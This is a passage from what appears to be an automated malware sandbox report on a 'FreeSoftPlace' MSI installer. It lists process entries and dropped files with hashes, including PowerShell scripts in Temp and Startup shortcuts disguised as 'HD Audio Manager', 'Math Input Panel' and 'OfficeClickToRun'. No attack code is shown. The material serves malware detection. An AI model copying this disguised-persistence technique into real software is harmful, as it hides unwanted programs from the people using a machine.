                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8278646f8,0x7ff827864708,0x7ff827864718
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:4020
                                                                                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:3588
                                                                                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:1536
                                                                                                                                                                                    • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                      C:\Windows\system32\vssvc.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:6052

                                                                                                                                                                                      Network

                                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                      Downloads

                                                                                                                                                                                      • C:\Config.Msi\e574b54.rbs

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        41KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        7dcdc61e6551dd8c0463916e8bff0701

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        2e87411e35447b60375c26f28ff7452f722f475b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        9153f8177bb334caead2ba79d9cffc8980636d0e67e1e2a746c0f194fc5bc773

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        6feac7ee55fe6e3eb6f3efec54b4e5f0287318fcd0e2d8ff50b5f40bc9047d0bcf3ffaf646bf2942ebadded68c0f1ad24bd42563f3084a6f458f825a63b76b44

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        b385929194b875890a5f11dff37cc0b0

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        dcafb5e5ea30dbfe0a4da43726366f6a2b0d6d1a

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        47592ecc8084a456e10de6b4e2a96121deb12fd004c42f1f3b0e124ecc8d533b

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        830f2b6321d300272a211f1beeebb5d4f1bdcbc3c7b4558efb438b1af5dc745f71408cec1bff51545e0250b21d7a2da68eb6d7df31eaae87065316cb43b74613

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        152B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        3e71d66ce903fcba6050e4b99b624fa7

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        139d274762405b422eab698da8cc85f405922de5

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        53b34e24e3fbb6a7f473192fc4dec2ae668974494f5636f0359b6ca27d7c65e3

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        17e2f1400000dd6c54c8dc067b31bcb0a3111e44a9d2c5c779f484a51ada92d88f5b6e6847270faae8ff881117b7ceaaf8dfe9df427cbb8d9449ceacd0480388

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        432B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        ceb5c6fe8dd40f691b36c75cf8f379a7

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        3c31c5e95bf5a005c42ff7fa805752be7d5dcd89

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        51abe993a8483c01e35effc6a3cf1fb2c181412209ccd43eac03992f2b8f8580

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        e9f116c7c09497244aa371b4ffd2d2908ea80f3ee50c4a81edfa58b1c73bd4f47bda432cfc93ed531970cf9ea1c90e9d1054e1b9dd251bcc8ec1e4405ce1c5e4

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        02acd7e384840b275ec56850d627adcf

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        f7a998750d745c0ebc973fa1d0b143343857407b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        fc8b622a15f379bc5a4529a32a4c9473f96a48151b3231f6914e33b4bbc6fb4c

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        5564774ec766d230ec860c0b1274b04d49db60cc655cf6b42a8ebeebfd256cf9a8c542f38d7f61a7ccfc3f63068ff2aa980b6bdf8324e103cd2774688db72751

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        6KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        f8df06ee6a40962fa742c917abdf0745

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        93cf00d4750b0cb4ffbb484943e591d628c1c682

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        487157d084ed7eace4d3c074163f658ab2725101245b213f654e32e841435a31

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        1c584258e41eb90d94783886da4b2c8e44c45c1ad7e6b531912c4846dc030bc42798778a008c79692fbb8fc53061c8f1340192a3c481fb754d4564cf9e32be97

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        5KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        5acb0b77e4905ce24317d633fb6ce4a9

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        473eef18f6184a315f2277877b9295d69746078b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        57cb30179b608edfa1c5d09351391a232699d8b82484ceda144c14e5ad16bb7e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        aa558753ab95aede1f1ce4d6984fcac1437cd25e8e52ed326e319babe14ee7e39c884959722f6a8aeaa933d61857c2b0611544a7b29b8914c32792851777dd74

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        24KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        1b1b142e24215f033793d1311e24f6e6

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        74e23cffbf03f3f0c430e6f4481e740c55a48587

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        3dca3ec65d1f4109c6b66a1a47b2477afaf8d15306a523f297283da0eccbe8b1

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        a569385710e3a0dc0d6366476c457927a847a2b2298c839e423c485f7dcce2468a58d20133f6dc81913056fb579957e67f63cf1e20b910d61816210447cd1f1f

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        16B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        6752a1d65b201c13b62ea44016eb221f

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        10KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        36e759d738eab177856596614b4900da

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        d59baad0b02f5be60ccb771009638e3f24ed6e3d

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        5918ef69f4806273554a18762cdf712853909cc79fc036381f0de2e8dc8ebc00

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        ace565efad776777ff683765a7fce24de4dad25df9d3896dcaa914c55b9faf3cf11a32323a810d7b88ab16c932b70e4fe83280f24a3f2be9523cb6ced7b90fdd

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        33e9dd1bc41e70c4fbdf04b85cf36ff4

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        0433625fae735abc2f11249456e212dfca1473a9

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        f11191abae782730f3e16400aef46c9e8404c2608dc132ec646b41e7f07911f9

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        d74083d2f0e7fe21db55c7c0bc880dd2d1fe92ca806c79f77ec0bbc7d2ae5fd1d3509d2ebd0fa60efbab0688711902b7a1da6419aba94a0897810ccf6d9957df

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        daac9c13da6de6812b488fe70af0184c

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        1ec08d3ce601c8912c1bb293d6d5bc750491e186

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        a36e315cb51ad4e3a8fc69ae369b1bdbc092554cef27b44a012c059d0184a8b5

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        5b634a6c7b4f9d55754ca6c49be18ee4757e1aa5665084b2b1f87e4fc91c5e751ec198e636078aaecaafce416349fae990da0c2f12d22aa6d77dfb56032e8d8d

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        5ef0b22d1ae3bf742d469ec6bf726463

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        d028c16100c504f31053060c879ae5415cabf5b7

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        3f037defea36d30f617ba8a4568c78e22d152894e00c6093f4cd4e94eda2acf1

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        61a0eff36be7d66574b13d6b2a45aa6ea34a3f24b97429d1d763e6bb76160c2561cc57c1c84d283d7660a6970247a7d683639f0bf872fc18c282c0112f28f3db

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        b8034322670a9612292079c7d58acc22

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        0b5430259fa3db203ba3b97cb17759d817e90276

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        acd50fb0582acd8b28b8dc27074dc4390aa0b0284af0e10679c05fd6c3292d72

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        359759769555fc39e5c4e2685f40821f05737f34b206e8b1c3dbc30a43916801be58f30756b5597447a631f90b25e57b936afc1f6d527955448496c7aea3a821

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        6b33cff2c64571ee8b1cf14f157f317f

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        ae4426839f5e8c28e8ac6d09b5499d1deda33fd2

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        0381f2b66fae947afa407755ca58105879f85411d9a78b99774059f982ee3619

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        61110504890848c0f2cff028a9f726445d5d63221bade9d3e801527483d29f9730051b10bdd5fa4b454cb40af130989c1aca3a123b5fe7ae665f3ee18c4fa2c2

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\FreeSoftPlace\2024.02.07\990F4DC\FreeSoftPlace.msi

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        72KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        cda9db6fa31f490e9325f5cd03815a55

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        c8b641f16c08276f03c837eed6d5d492d538031d

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        aa2cd1e146e3421d3c6d0eb0a24929ec7140c79bbc4e7bab71b460f04eefae7a

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        f8d910f40c2f657fad190637aa0d59702c05b8b2e2ae82af58ca7ed963045baa276716ea48aa163badf62300f884ddc951be9f957bfe00389d50a35b0b27c664

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\FreeSoftPlace\2024.02.07\990F4DC\FreeSoftPlace.msi

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        5.3MB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        08b8a91e79d2c9abd65f0925951608ca

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        64c5506edf64a8927da2d32a18dd2c4f1d8fe7ab

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        e679b099159597209b5099fc6dcda611d4114f618adbfcff8b98786ffe19e923

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        ad03b4b85e1fabe32cc6369a6e2ccada490aa980bddf98c6b5fb9fa433e8d13dafcd6127d1cc414a552218fa5bc834d4162ab137607ce09520693010673654e0

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MSI49FA.tmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        738KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        36cd2870d577ff917ba93c9f50f86374

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        e51baf257f5a3c3cd7b68690e36945fa3284e710

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        8d3e94c47af3da706a9fe9e4428b2fefd5e9e6c7145e96927fffdf3dd5e472b8

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        426fe493a25e99ca9630ad4706ca5ac062445391ab2087793637339f3742a5e1af2cedb4682babc0c4e7f9e06fed0b4ed543ddeb6f4e6f75c50349c0354aceda

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MSI4A78.tmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        666KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        4e773842e764be9f5a2686318da7fc77

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        2fd77fa2b0d980be15a10d36979d603976467496

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        d807b6c39653ac5c40dd664e8382df92937af7ac8d5e0206dd9fa72ba4eb8b01

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        c11775ebbce1bd6ffb664eca44118f03d976b30fc245aae6093372735545026c9837582007b5ac99ff941c9753cff880494768d83830b2a3cd15bf3269c2ed28

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MSI4A78.tmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        464KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        dc99d250d74d9d403e57584f0371b838

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        c7f64f902d8d9883cc9fec5a3f6cb1aadb948dff

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        b5da47f4cf95659573177773e694025eb35f16beffadac0452d53c95ba334397

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        f42a1fed9a116bd6c3a1721cbb4122619811852322e1834532b9aa045ab5def94ec3e1a592bb1008427802430d89828d2f287894b861221f1ba60921e6f312cc

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MSI4AB8.tmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        296KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        3309a3c5fd835d3561b02f9c8eea9dbf

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        b46fb2545219f483dbf902e75a8d37cac36c7c05

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        a4a8eca0030c0346ac1311557ec5de08f9ae144ef7381026ccf8955cf6f05a5f

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        5a5d0ce190c7c19524501611a84398e071e7bc14b8e2ef0813ace791cd30058333f6a728744040deb0ec033d867b101c0c2bf43e96fbd0fe9a219ec518889a0d

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MSI4AB8.tmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        227KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        9aefa35283ef5b368349c70170d16e81

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        c05ce07cb80c39e314c2b8f60afb30567ee80183

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        407b6bd1c31fc2d55b54c0c90216d772aab516680569ac72625a223e3fecc8e3

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        eb4910959490df14ba81766fefed4e58d6cb75efce6dd5aaeb6d1e8c39b955589d5602ad80f4210605da1e52fe94058db664acc99f131165ed3905a24f36d280

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MSI4AB8.tmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        156KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        fa9c50305343190e04b170feb2a33aec

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        c6ef5523aa817c328ed1d37a49ea193c9d2fe6b1

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        2a58f4f195284eca44569bb88157e81da7581912c8cc80cd8e7a52e02e42777b

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        79223e9a691af719b793c6b27b202024de86a5e3c67f165357a1c1fca938979ffe3290257e4a7d692fe1f1e2f515e5bdb113d9a283583eccdfc4855f5e4af015

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MSI4AE8.tmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        121KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        01032c7ed5f19d36fbfb321f18bc4552

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        5de2bdc5f93848cd6749febd1c7771b9d182fb19

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        aac2c18d443668b106efb22bbd2f59cd2595cfc28cb70907b2499ead01148958

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        155e3e1c1e6b6d8bb19b35d77fdaa52b68023cb2a22a64694e1b8296211e2eb68ae52afc13c469c34190b0a251c21e50fa9f15044392cf013b1a0db594d8201c

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MSI4AE8.tmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        132KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        9f82bf6a88368ba52d94e1640c1de5f9

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        9a8104fac4575da22c11c3e0d40ccdfdf1d47466

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        f9fa5915d07dd2a90fe3b916b47c0b1118c6c1b49c8e0fedbf5c9d9709c1f2d6

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        1780e131bed6e7e7fb86f5f63c81a16ed3e04ad7d8d4246f22d8a84a03b5c2358ff8ff3970dd3826359f4f30fa2a94fb64ae7b3caa3474093daeb62386b20c4b

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_woqpaapi.s4k.ps1

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        60B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\pss4E13.ps1

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        6KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        30c30ef2cb47e35101d13402b5661179

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        25696b2aab86a9233f19017539e2dd83b2f75d4e

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\scr4E11.ps1

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        12KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        a614fef7a066f18bd5def23c646873a8

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        89a405f09e95ff33f970938ae0bad61cb9484df2

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        9ef3ac6deb0a9011a9d7962beb457d6e017bdb81b6b03c3bca84ba6e00bfaf53

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        0a3834ff9a617d939e47117359cac5f6b6d2621cfe06ec1e224e904dcd5cfb23203a42f84cb8e9176c1af7572de9534f0da2a80f8dbef2669ae8b639d20e9431

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\scr5BE1.ps1

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        2KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        e7ccb340d383761881fe0f6b3cd27c34

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        fcee8cb0ef820bf32ed2cc7ae0a65c1156145661

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        3ad9b99e28f2ac7b96fd13de59a2d2ec77e2022f01012d9bcd4eda73980db169

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        184141fd61602519ac3e4b69cafc6de35285856d6252a9dbc1a25ea410948245435057c97a64800ba211490f92d05ac47540afba6a96af8cd69723655a91559b

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\scr6EA3.ps1

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        98150c92cafdf092d0c596c5aa7278f0

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        607a6a1363be70cfc96b0c93ec149b31d331d4d2

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        571d298c418f9e5b3e72ed98dab5aa0d5c6bcbd4c54be2f015181b7df238d803

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        30df36fe54abe06c5d159c2ec96f20867b9b2707b8fab151b0f1d6dc9da789b317bd3e1da7c3adc1d4de43b143e590b464295a1d93c0f017148d0194a012b3ee

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\scr7F81.ps1

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        6d3daff89b0becef95ae20b8bb8ecd7b

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        08b22ef4dc8ecd39a2f21a96aa9d59b0e8cd0ab0

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        b36bce6d6687733bc1b461f2cb311cc94b67b5aea19271908b382072ac8ba915

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        64a11618dd751507b2cc38841da7fd94549fba8504fbc1afec9c5e5f66aba7e55c2c122ef62bca3bf5cfb02e7711d28bbd16426345e8957a16ddab78aa308e85

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\scrA06C.ps1

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        12ac3f347db7da50904d2c0d581c21f2

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        dc11867be6f031996a933ea60c1e8dde4127e270

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        8682c2e33c3423bd649ccb407a6bc1cb8b6e5aae6cfe34966a12651f814991c6

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        e5ee9c9d9c7cdaa1c9db99e91cc57da6ef92edbcf1a317d30e3b59ff51b06cd8024b8785892d66458c814ad925071929f5726dcc055df6b01797e914bd214276

                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HD Audio Manager.lnk

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        853B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        2b9a9483e8ec22252bf7a7cffaf82f48

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        2eb9c7eec2c77ee24d527a4143b1769a098723a2

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        623b99532b236191371bbac354e98a6d70467742eeda4591b4c02bca09659fe5

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        0be72972e1bfe5e318ccb8906d07fea3fca905a045980345e6e07495f61e676166ece6c7cd0e39a23614b43779e08e4c9f8374e714cf4571aa33806fb047e540

                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HD Audio Manager.lnk~RFe58a321.TMP

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        808B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        931594006e7e99f66e3dc056e760d583

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        182e2054cc4a17440cc10454c1be844316018102

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        4fdd793dc71c2c687d3bb621762611d6059cfa17befb21a3944e243420d1bb89

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        42499ff765cf99fd25c2428176940a4da2b0cc7874c97a8f919782d759f91a237c273d0822691dd508ccf615bb6e3131cc1699bcbf6a89b5446499531b625914

                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Math Input Panel.lnk

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        98997cd057d7fb90adc09ee85fd09ed6

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        6eb7135cb9cacbed87f801f4cf044d56def9ddfc

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        bc1053a74fbf67583fbdc1521c2735f56dd1c8f4b3faec5d2826aa395e78261c

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        f745fb8d353ac327c4d34b97c524bc789983177b861cd865fb734c684b51d6ba03be40725c438ac5116a1e069f2c692aeafe46c13f6e4628769f41bf7d0db548

                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Math Input Panel.lnk~RFe58a227.TMP

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        66ae251b294c64b3c82cfa9bc1845c60

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        1b631faaaa0370f644d8599da86671058042699e

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        a2b41efbe152230c4b870a9eb240b770ffb367604c73843fd79d5f140905dfe9

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        404a0991d8c29bfe13783315713ddc1de6fffa59da54834556ff82797303c8e3a48fd1cf8014e538609284df6d2155138d707d1fad13a1946b51efd1d556d7cc

                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OfficeClickToRun.lnk

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        853B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        5ae500af101e5ee8c63d9a0fa3663f2e

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        f5e4da4b37707a29285a83de910f09d64c4f70de

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        c369b3166a0b7d9c2af809362b5fb50bf46060384d496f88146d4d3d200b0e81

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        6a266b4485eab0da9534a6f12fbc34e04f746b5ad4a4d60b43c15067ec8868b85e70b7f4ddb70e6fb404f498d1e4f2ca3d6adbb650ac1c28ea0a7a1fbb228a13

                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OfficeClickToRun.lnk~RFe58a38e.TMP

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        808B

